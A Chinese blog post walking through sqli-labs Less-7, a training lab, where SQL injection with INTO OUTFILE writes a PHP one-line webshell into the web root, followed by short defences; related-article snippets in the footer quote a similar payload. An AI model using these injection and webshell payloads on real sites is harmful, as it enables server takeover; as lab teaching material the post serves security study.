利用注入写Webshell(sqli-labs第七关)

最新推荐文章于 2023-07-18 20:24:47 发布
最新推荐文章于 2023-07-18 20:24:47 发布
阅读量501 收藏 1
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47912094/article/details/119523102
版权

结合PHP一句话木马
利用outfile生成文件:
利用条件
1、文件具有写的条件;
2、知道绝对路径。

以sqli-labs第七关为例
http://192.168.3.10/sqli/Less-7/?id=1;
在这里插入图片描述
http://192.168.124.13/sqli/Less-7/?id=-1’ union select xxx into outfile ‘绝对路径’ --+

构造写马语句:
http://192.168.124.13/sqli/Less-7/?id=-1’ union select 1,2,’<?php eval($_POST["cmd"]);?>’ into outfile ‘D:\phpStudy\PHPTutorial\WWW\sqli\Less-7\xxx.php’
需要使用\来代替目录中的\(不过好像也可以不用…)
在这里插入图片描述

查看一下生成的xxx.php

需要注意的是利用数据库file权限向操作系统写入文件时, 对于相同文件名的文件不能覆盖,所以如果第一次上传xxx.php,下次在上传xxx.php,就是无效命令了,也就是新的xxx.php中的内容并不会覆盖,之前的xxx.php

防范方法:
不开启写条件;
过滤用户输入;
使用PDO技术。

CoOlCoKeZ
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第七
学习
08-24 981
在第五六卡了好几天,终于走到第七了,首先查看源代码可以看到,SQL查询语句为SELECT * FROM users WHERE id=(('3' )) -- ')) LIMIT 0,1 于是构造绕过语句 192.168.18.136/sqli-labs-master/Less-7/?id=3' )) --+ 接下来,我们发现 union 1,2,3一点用都没有 ...
webshell-dictionary-master 上千个webshell合集
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后...
sqli-labs 1-65 练习
qq_53742230的博客
02-23 960
sqli-labs 一个专注于sql注入的靶场,总共75涵盖了全部的sql注入方法。经过前面的学习发现自己对于web漏洞的了解还是不够,勉强算得上是一个 Script Kiddies ,对于安全来说,我们一定要对web漏洞都了如指掌。要不然漏洞丢到脸上可能都不会利用,于是就有了这篇文章。我决定全程使用手工注入或者自己使用python脚本来通sqli-labs。一方面可以增加自己手工注入的能力,一方面可以增强自己使用pythonexp或poc的能力。
2023年网络安全面试题(渗透测试):详细答案解析与最佳实践分享
热门推荐
weixin_43263566的博客
07-18 1万+
命令执行漏洞指攻击者可以随意执行系统命令的漏洞。当攻击成功后,攻击者可以继承Web服务程序的权限,执行任意代码、读文件,甚至控制整个网站或服务器,甚至进一步进行内网渗透。内网攻击莫忽视:在流量分析过程中,不要忽视内网的攻击行为。内网攻击可能是来自恶意软件、僵尸网络或内部威胁等,及时发现和响应内网攻击至重要。企图告警需排查:当发出告警信号时,需要仔细排查可能的企图行为。不仅要注被攻击的目标,还要查看攻击者的来源、攻击方法和可能的目的,以便更好地理解攻击行为。
sqli-labs-----第7
wyzhxhn的博客
11-09 2068
布尔盲注、一句话木马、利用文件入爆出信息
sqlilabs第七
qq_45491497的博客
07-28 2416
outfile导出文件 用到了一个outfile函数,可以将sql语句的结果导出在文件中 先查询一下导出的目录位置 导出文件 load_file入文件 导出一句话木马 id=-1')) union select 1,"<?php @eval($_GET['cmd']); ?>",3 into outfile "D:\\phpStudy\\2.txt" --+ ...
第01篇:MySQL注入WebShell的5种方式1
08-03
1、在默认数据库 test 中创建测试表admin和测试数据,新建test用户授予FILE权限 2、使用test用户连接 1、利用Union select
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
主要介绍了浅谈一次与sql注入 & webshell 的美丽“邂逅”,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
强大的webshell管理工具-哥斯拉
12-27
只有适合自己的工具,没有好坏之分,拿走不谢。
第十二节 文件上传-图片Webshell上传-01
最新发布
09-15
第十二节 文件上传-图片Webshell上传-01
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
WebShell Lite-开源
05-03
一个小型,便携式,直观,类似于外壳的环境,用于网站管理。 它不是文件管理器,而是供习惯于Unix Shell并喜欢使用习惯于使用其命令的基本例程的用户使用的界面。
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
sqli-labs第七(详讲)
TA不懒,但还没有添加简介
09-11 4112
sqli-labs第七 第七根据提示知道要用outfile,于是通过注入判断发现是字符型 开始构造语句 结合前六的经验首先想到括号) 不对 再加一个括号试试? 对了 那么语句部分可能是 where id=(('$id')) 然后通过order by判断字段个数 先简单的提一下outfile 在MySQL里面使用select … into outfile可以把数据导出到文本文件上 里面有几个参数 secure_file_priv 用来限制导出效果。他有三个属性: null限制不能导出 为空可
使用burpsuite进行布尔盲注(sqli-labs第7)
J14N的博客
01-30 1109
sqli-labs less-7使用burpsuite布尔盲注(纯小白,刚接触sql注入,有更好的办法欢迎评论区留言)
sqlilabs注入webshell的无聊尝试
weixin_42513429的博客
04-29 361
sqlilabs注入webshell的无聊尝试 使用phpstudy搭建好环境,PHP环境为5.6.9,数据库版本为5.7 Less-1 很常见的注入,单引号报错,再加一个单引号不报错,猜测数据库语句为: select * from xxx where id='$id' limit 1 所以我们构建payload: ?id=1' order by 3 --+ ?id=1' order by 4...
SQLi Labs Lesson7
1ame的博客
08-07 728
Lesson-7 GET - Dump Outfile - string 首先进入欢迎界面。 构造?id=1,结果如图所示。 构造?id=0,结果如图所示。 猜测和上一节一样,执行SQL语句后,如果SQL语句查询到匹配的数据就显示‘You are in.......Use outfile......’。 如果没有查询到匹配数据,就显示‘You
upload-labs 第三
08-25
upload-labs 第三是一个于图片上传的挑战。根据引用和引用,在这个卡中,你需要上传一个 PNG 或 JPG/JPEG 格式的图片文件,同时避免使用 webshell 来上传。然而,根据引用,在此卡中,系统使用了 getimagesize 函数来判断文件类型,因此你可以利用图片码绕过 exif_imagetype() 检测。所以,你可以通过上传一个伪装成图片的 webshell 来绕过这个检测。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [upload-labs详细教程](https://blog.csdn.net/shayebudon/article/details/121223473)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [upload-labs-0.1.zip](https://download.csdn.net/download/qq_38626043/13746450)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值